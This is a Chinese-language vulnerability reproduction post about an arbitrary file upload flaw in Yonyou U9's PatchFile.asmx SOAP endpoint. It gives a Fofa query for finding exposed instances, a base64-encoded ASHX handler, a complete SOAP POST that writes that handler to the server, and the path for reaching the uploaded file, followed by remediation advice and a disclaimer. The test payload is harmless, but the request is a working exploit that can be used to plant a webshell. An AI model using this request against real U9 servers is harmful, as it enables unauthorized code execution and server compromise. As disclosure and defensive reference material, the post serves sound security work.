用友 U9 PatchFile.asmx 任意文件上传漏洞

admin

138985
文章

114
评论

2024年6月6日22:09:07评论50 views字数 2548阅读8分29秒阅读模式

产品简介

用友U9聚焦中型和中大型制造企业，全面支持业财税档一体化、设计制造一体化、计划执行一体化、营销服务一体化、项目制造一体化等数智制造场景，赋能组织变革和商业创新，融合产业互联网资源实现连接、共享、协同，助力制造企业高质量发展。

漏洞描述

用友 U9 PatchFile.asmx 接口存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。

网络空间会测

Fofa

body="logo-u9.png"

用友 U9 PatchFile.asmx 任意文件上传漏洞 — image.png

漏洞复现

将ashx测试文件进行base64加密，输出 Hello, World!

<%@ WebHandler Language="C#" Class="HelloWorldHandler" %>

using System;
using System.Web;

public class HelloWorldHandler : IHttpHandler
{
    public void ProcessRequest(HttpContext context)
    {
        context.Response.ContentType = "text/plain";
        context.Response.Write("Hello, World!");
    }

    public bool IsReusable
    {
        get { return false; }
    }
}

base64:

PCVAIFdlYkhhbmRsZXIgTGFuZ3VhZ2U9IkMjIiBDbGFzcz0iSGVsbG9Xb3JsZEhhbmRsZXIiICU+Cgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5XZWI7CgpwdWJsaWMgY2xhc3MgSGVsbG9Xb3JsZEhhbmRsZXIgOiBJSHR0cEhhbmRsZXIKewogICAgcHVibGljIHZvaWQgUHJvY2Vzc1JlcXVlc3QoSHR0cENvbnRleHQgY29udGV4dCkKICAgIHsKICAgICAgICBjb250ZXh0LlJlc3BvbnNlLkNvbnRlbnRUeXBlID0gInRleHQvcGxhaW4iOwogICAgICAgIGNvbnRleHQuUmVzcG9uc2UuV3JpdGUoIkhlbGxvLCBXb3JsZCEiKTsKICAgIH0KCiAgICBwdWJsaWMgYm9vbCBJc1JldXNhYmxlCiAgICB7CiAgICAgICAgZ2V0IHsgcmV0dXJuIGZhbHNlOyB9CiAgICB9Cn0=

poc：

POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 SE 2.X MetaSr 1.0
Content-Length: 898
Content-Type: text/xml; charset=utf-8
Soapaction: "http://tempuri.org/SaveFile"
Accept-Encoding: gzip, deflate, br
Connection: close

<?xml version="1.0" encoding="utf-8"?>
 <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
   <SaveFile xmlns="http://tempuri.org/">
    <binData>PCVAIFdlYkhhbmRsZXIgTGFuZ3VhZ2U9IkMjIiBDbGFzcz0iSGVsbG9Xb3JsZEhhbmRsZXIiICU+Cgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5XZWI7CgpwdWJsaWMgY2xhc3MgSGVsbG9Xb3JsZEhhbmRsZXIgOiBJSHR0cEhhbmRsZXIKewogICAgcHVibGljIHZvaWQgUHJvY2Vzc1JlcXVlc3QoSHR0cENvbnRleHQgY29udGV4dCkKICAgIHsKICAgICAgICBjb250ZXh0LlJlc3BvbnNlLkNvbnRlbnRUeXBlID0gInRleHQvcGxhaW4iOwogICAgICAgIGNvbnRleHQuUmVzcG9uc2UuV3JpdGUoIkhlbGxvLCBXb3JsZCEiKTsKICAgIH0KCiAgICBwdWJsaWMgYm9vbCBJc1JldXNhYmxlCiAgICB7CiAgICAgICAgZ2V0IHsgcmV0dXJuIGZhbHNlOyB9CiAgICB9Cn0=</binData>
    <path>./</path>
    <fileName>bTRkH1.ashx</fileName>
   </SaveFile>
  </soap:Body>
 </soap:Envelope>

返回true表示上传成功

访问路径：

http://127.0.0.1/CS/Office/AutoUpdates/bTRkH1.ashx

修复建议

1、如⾮必要，禁⽌公⽹访问该系统。

2、通过防⽕墙等安全设备设置访问策略，设置⽩名单访问。

3、升级到产品到最新版本

原文始发于微信公众号（凝聚力安全团队）：【漏洞复现】用友 U9 PatchFile.asmx 任意文件上传漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

用友 U9 PatchFile.asmx 任意文件上传漏洞

产品简介

漏洞描述

网络空间会测

Fofa

漏洞复现

修复建议

三星路由器WLAN-AP-WEA453e-未授权RCE等多个漏洞

UNACMS PHP对象注入漏洞(CVE-2025-32101)

MRCMS（蘑菇建站）跨站脚本漏洞及解决方法（CNVD-2025-05252、CVE-2025-2195）

【风险通告】PyTorch存在远程代码执行漏洞（CVE-2025-32434）

PyTorch 中存在严重的RCE漏洞

CVE-2025-22457：基于堆栈的远程缓冲区溢出的POC验证脚本

Kubernetes CVE-2025-1974 RCE POC

CVE-2025-27218｜Sitecore CMS远程代码执行漏洞

CentreStack 反序列化漏洞 (CVE-2025-30406)

Windows提权漏洞CVE-2025-21204

发表评论

在线咨询

微信